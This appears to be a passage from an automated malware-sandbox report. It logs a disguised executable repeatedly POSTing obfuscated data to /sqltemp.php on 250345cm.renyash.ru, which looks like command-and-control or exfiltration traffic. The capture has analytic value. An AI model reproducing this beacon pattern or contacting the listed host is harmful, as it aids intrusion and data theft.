                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BW%2BwpNraj17wdUmnh4K6J7uy4W5dMMWAwfP2CrpTzIoIAAph8ptlzoDs2rlKLAWeRecql%2F4sM2SSiUqSepT5X8%2FgLQtuxP7yNKtpUq0hhY512n5%2BOeobGO90vqeMfoyQpbigVxpE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36470defd42fd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4299&min_rtt=1686&rtt_var=5859&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64621&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
45  192.168.2.6  62643  104.21.38.84  80  7048  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp  Bytes transferred  Direction  Data
Jan 1, 2025 16:02:47.612899065 CET  302  OUT  POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:47.969753027 CET  1124  OUT  Data Raw: 56 57 5a 51 51 5f 51 56 58 56 52 59 56 5c 59 56 5b 59 54 5e 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VWZQQ_QVXVRYV\YV[YT^UZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$/]4?*$D,&7>/<0), ",?+C&Y+9:&Y.,Y-5
Jan 1, 2025 16:02:48.053347111 CET  25  IN  HTTP/1.1 100 Continue
Jan 1, 2025 16:02:48.312625885 CET  807  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLsw2RVbya9%2Bd3g1kpGOHjT9lxpYKqHzbGo2mSPY0sr0dU5nTMGWZ619VB4FNARl6xaZQDN3wXeZGOTq14yWYyl0SD4NL59mCQvtBc4iiPQ3Y1f%2Fifm5DFVbbCCB%2B8go1HG%2FiIu9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364760c4342df-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2592&min_rtt=1643&rtt_var=2514&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=158059&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 62649 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:48.456559896 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:48.813548088 CET | 1124 | OUT | Data Raw: 56 54 5f 56 51 5b 54 52 58 56 52 59 56 58 59 5e 5b 5c 54 51 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_VQ[TRXVRYVXY^[\TQUZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.&?"<%$X7A/W =(_+_<*,]#"4<;)%/.&Y.,Y-%
Jan 1, 2025 16:02:48.901920080 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:49.160979986 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQCzcF9p47u4XCcElNtmTHAGqlNsR1nc%2BonP3eC9uRN8z0gQ7fk4Lr5alEoAa4Ei4W0seXuM%2F4%2F4vpThDe2zIqsXJup4%2B746ViCkKyFZVJMeKgbEqvEdsdiJi%2BGwaTgLvzHBumug"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3647b585d0cc6-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=1711&rtt_var=1489&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=286106&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 62656 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:49.286887884 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:49.641509056 CET | 1124 | OUT | Data Raw: 53 57 5a 51 51 58 54 52 58 56 52 59 56 5a 59 57 5b 53 54 5a 55 55 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SWZQQXTRXVRYVZYW[STZUUPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0>#Y!\%.;8W =;(:'U(.X 7((=%/8-&Y.,Y--
Jan 1, 2025 16:02:49.758861065 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:50.027173996 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BD0xGFzw1zgGUfG9gXqejUK%2BT8p1E%2BZbHvPbG71%2Fi%2F3fQPUsorzkYxFA5DXJRK0bPzL0mqGI8Qm1tC1HAcUXkCWiQ4EhKduSr9XLrVchzCeT4f7NHJJrZonOskbJVGFtPWCaTkoO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36480a8974286-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4376&min_rtt=1630&rtt_var=6103&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=61867&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 62662 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:50.163727045 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:50.618284941 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:50.629998922 CET | 1124 | OUT | Data Raw: 53 53 5f 54 51 58 54 5d 58 56 52 59 56 51 59 53 5b 58 54 58 55 55 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_TQXT]XVRYVQYS[XTXUUP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[$5X#%37@.*& *)'R*=8]!2'\(9A&,*&Y.,Y-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 62666 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:50.710372925 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:51.063600063 CET | 1964 | OUT | Data Raw: 53 53 5f 53 51 5b 54 5d 58 56 52 59 56 5d 59 5e 5b 5c 54 5a 55 58 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_SQ[T]XVRYV]Y^[\TZUXP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3?=]7/.%-;E;)!R4Z(94>X \72(<;$?,-*&Y.,Y-1
Jan 1, 2025 16:02:51.175319910 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:51.433964968 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18lIsAgiah6l37zZvyRCWoRcosEHlwO8%2BnIgx%2B8DF8RfCizYrEM6LojQuRCykBuRT2jjksiAj%2BD%2BsKwZ6zbcC9Utv3WMgh4GXFvCsLcSGQ0XwGTknSl1kBiSuTp3Y%2Bm6Z0dzN9qD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364898dc50f4d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2937&min_rtt=1719&rtt_var=3081&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=127321&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 0f 3d 3d 36 55 32 54 24 59 3f 3d 3f 53 27 3d 35 04 2b 01 31 04 30 3e 09 59 29 17 3c 05 21 2f 31 59 32 06 28 58 34 03 05 13 33 34 2b 59 05 1c 20 06 21 11 27 00 29 3d 09 15 31 59 2e 05 27 3d 20 14 28 01 34 1e 22 2b 27 5a 30 03 3f 04 3d 04 28 1f 33 02 33 19 39 11 00 0c 27 2a 2c 54 00 11 26 57 27 08 37 04 37 34 27 05 36 0f 39 12 31 24 32 53 24 2f 24 0c 20 00 39 00 27 21 33 59 21 30 2e 12 27 38 3d 5d 20 03 2c 0b 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&==6U2T$Y?=?S'=5+10>Y)<!/1Y2(X434+Y !')=1Y.'= (4"+'Z0?=(339'*,T&W'774'691$2S$/$ 9'!3Y!0.'8=] ,=.%S -H?WS0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 62669 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:51.030154943 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:51.377640009 CET | 1124 | OUT | Data Raw: 56 56 5f 57 51 5c 51 52 58 56 52 59 56 5e 59 5f 5b 59 54 59 55 5b 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_WQ\QRXVRYV^Y_[YTYU[PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$)"/'>'/9>7$_+#*4\7++!D%Y7R9:&Y.,Y-
Jan 1, 2025 16:02:51.481091022 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:51.648478031 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mv74JsviBj2sCUNl6papZR%2F%2ByYJgUk9NW3LH4OpkzEjO3uarqqbEJ3r7oVu8gxIstpcKOmP6EXEEo0ut%2BVvKbDIM3xxKT57OnFw95B4vIjDnqW5DfNQtCvEmV5SRIVRLrNhKjek8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3648b68494267-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8032&min_rtt=1746&rtt_var=13227&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28056&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 62675 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:51.885951996 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:02:52.235344887 CET | 1124 | OUT | Data Raw: 53 50 5a 56 54 50 54 5c 58 56 52 59 56 5a 59 5e 5b 5b 54 5b 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZVTPT\XVRYVZY^[[T[UXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.0>7,:0.E8=7,('*>Y72,*+@&?.*&Y.,Y--
Jan 1, 2025 16:02:52.348953009 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:52.608517885 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0J88q5Gt6gGOde1eXrPbND5XFPT0WYHD8oArgv4GJkiYjSXK0Ch%2F%2Fl%2BKpgyfeVK5rBIw%2F3%2BIyExlARs3qorlW6V7ynCo%2BdrHe4S7yM1O1puiLiJJkfSQF0DD2rPGTT3gF95UQC%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36490ddb94219-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4698&min_rtt=1745&rtt_var=6560&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=57548&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 62681 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:52.738939047 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:53.187520027 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:53.189836025 CET | 1124 | OUT | Data Raw: 56 54 5f 56 54 5a 54 52 58 56 52 59 56 51 59 53 5b 5a 54 5d 55 55 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_VTZTRXVRYVQYS[ZT]UUPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'?"/3',=7><Z<9R>?##Y?+.1?R.:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:53.549643993 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QI3zZ5UpylqdNzpp%2Bw7sqWmfQIfJYn6kh6kDHPgwZfDRk7miDNnjTGMZyMTXKGi1TTo0lCaQqWywuwdcr6sQVQxNicHVzir7RlHYvYTEcDMs%2FMXgvSlYm2ixEICxz4emMF2gt%2FQ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364962fc84321-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3864&min_rtt=2616&rtt_var=3478&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=115827&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  53 | 192.168.2.6 | 62688 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:53.676897049 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:54.032226086 CET | 1124 | OUT | Data Raw: 56 57 5f 56 54 59 54 50 58 56 52 59 56 5f 59 53 5b 5e 54 5f 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VW_VTYTPXVRYV_YS[^T_UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?9Y#)_$87*93V>8 0+&2U::&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:02:54.121498108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:54.284826040 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FhmGaZeiV2JHE7eUxR0w1TlpEbjsRD6oJlAQJb8PU4Bl9jt4UFFKYKPGRwMkLO6Ld4B1ZdGoaabTJvqAKTOyyxwzdl3dK%2B0L3AMiloPnudMm2DyU0lBfQhCih8PMKjgO7xyj9eq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3649bf9ce41d8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
